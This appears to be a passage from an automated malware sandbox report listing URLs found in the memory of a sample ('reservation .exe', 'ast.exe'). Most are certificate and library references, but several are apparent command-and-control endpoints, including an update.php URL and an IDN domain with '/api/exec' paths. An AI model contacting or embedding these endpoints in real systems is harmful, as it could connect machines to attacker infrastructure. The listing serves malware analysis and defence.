Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: reservation .tmp, 00000004.00000003.2454431247.000000000372F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://jrsoftware.github.io/issrc/ISHelp/isxfunc.xml
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455548445.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000315E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455975979.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, aw_sas32.dll.8.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: reservation .exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: reservation .exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: reservation .exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: reservation .exe | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: reservation .exe | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/gsgccr6alphasslca20230W
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BEC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr60;
Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/exe
Source: reservation .exe | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: reservation .exe | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr6alphasslca2023.crt0
Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BEC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt06
Source: ast.exe, 0000000A.00000002.3307409011.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2872296448.0000000002790000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000C.00000002.2955493951.0000000002850000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://solicecare.website/de37/update.php
Source: ast.exe, 0000000C.00000002.2955493951.0000000002850000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://solicecare.website/de37/update.phph?
Source: ast.exe, 0000000B.00000002.2872296448.0000000002790000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://solicecare.website/de37/update.phpr
Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000C.00000002.2954858422.0000000000C98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/Types
Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/Types.
Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/TypesE
Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/Typesbcrypt
Source: ast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/Typesn
Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/Typesu
Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/Typesw
Source: ast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.borland.com/namespaces/Typesy
Source: ast.exe, 0000000C.00000003.2953257211.0000000002DDD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.indyproject.org/
Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://www.openssl.org/)
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000314A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.openssl.org/V
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873934994.0000000061EA0000.00000008.00000001.01000000.0000000D.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ast.exe, 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: https://curl.haxx.se/V
Source: ast.exe, 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: ast.exe, ast.exe, 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ast.exe | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://datatracker.ietf.org/ipr/1524/
Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://datatracker.ietf.org/ipr/1526/
Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://datatracker.ietf.org/ipr/1914/
Source: ast.exe, 0000000A.00000003.3299966293.0000000005BF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.x
Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835183941.0000000005C31000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn-
Source: ast.exe, 0000000A.00000003.3035050247.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265864125.0000000005C70000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aa
Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3324461869.0000000006A0C000.00000004.00000001.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337372696.000000006C946000.00000004.00000001.01000000.0000000F.sdmp, ast.exe, 0000000A.00000003.2835407797.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073203061.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005BF2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3034431813.0000000005C80000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300702932.0000000005C69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai
Source: ast.exe, 0000000A.00000002.3307636336.0000000002EF2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai)
Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dll/
Source: ast.exe, 0000000A.00000003.3299122357.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300702932.0000000005C69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dllC;1
Source: ast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dllI
Source: ast.exe, 0000000A.00000003.3267513698.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005BF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dllM
Source: ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai00
Source: ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai3
Source: ast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai4j1
Source: ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835407797.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807629713.0000000005C27000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443
Source: ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443-
Source: ast.exe, 0000000A.00000002.3324461869.0000000006A0C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...
Source: ast.exe, 0000000A.00000002.3307636336.0000000002EE3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...43
Source: ast.exe, 0000000A.00000002.3307636336.0000000002EE3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...4335AW
Source: ast.exe, 0000000A.00000003.3299966293.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/
Source: ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3322683873.0000000005C9D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300835223.0000000005BEC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
Source: ast.exe, 0000000A.00000003.3299966293.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/stClnD956C
Source: ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/stClnstCln
Source: ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4432
Source: ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3307636336.0000000002EEB000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335
Source: ast.exe, 0000000A.00000002.3309198121.0000000003122000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335-
Source: ast.exe, 0000000A.00000002.3309198121.000000000311B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335...
Source: ast.exe, 0000000A.00000002.3307636336.0000000002EEB000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335y
Source: ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4439c0
Source: ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443ata
Source: ast.exe, 0000000A.00000003.2895297263.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443dm
Source: ast.exe, 0000000A.00000003.2784033119.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807629713.0000000005C27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g
Source: ast.exe, 0000000A.00000003.3265137068.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3267513698.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g1
Source: ast.exe, 0000000A.00000002.3306161257.0000000000D73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443g=
Source: ast.exe, 0000000A.00000003.3007986036.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gD
Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gE
Source: ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3267513698.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gK
Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3007986036.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gW
Source: ast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gh
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gt
                          Source: ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443gz
                          Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443ln
                          Source: ast.exe, 0000000A.00000003.2895297263.0000000005C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnJm&
                          Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnd
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lndm
                          Source: ast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnmm
                          Source: ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443lnw#
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443mm
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiI
                          Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiZ
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807379986.0000000005C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aid
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aid003
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aidll
                          Source: ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aidllm
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aie
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aie03
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aieY
                          Source: ast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aierW
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiexe03
                          Source: ast.exe, 0000000A.00000002.3325606674.000000000889D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aifgGu
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiget
                          Source: ast.exe, 0000000A.00000002.3324808318.0000000006D4D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aigiGu
                          Source: ast.exe, 0000000A.00000002.3325486557.0000000007E9D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiheGu
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002EF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aii
                          Source: ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aim;
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aink
                          Source: ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ainkEx
                          Source: ast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ait.exe
                          Source: ast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ait.exeje
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aai
                          Source: ast.exe, 0000000A.00000003.3265864125.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--8X
Source: reservation .exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: https://sectigo.com/CPS0
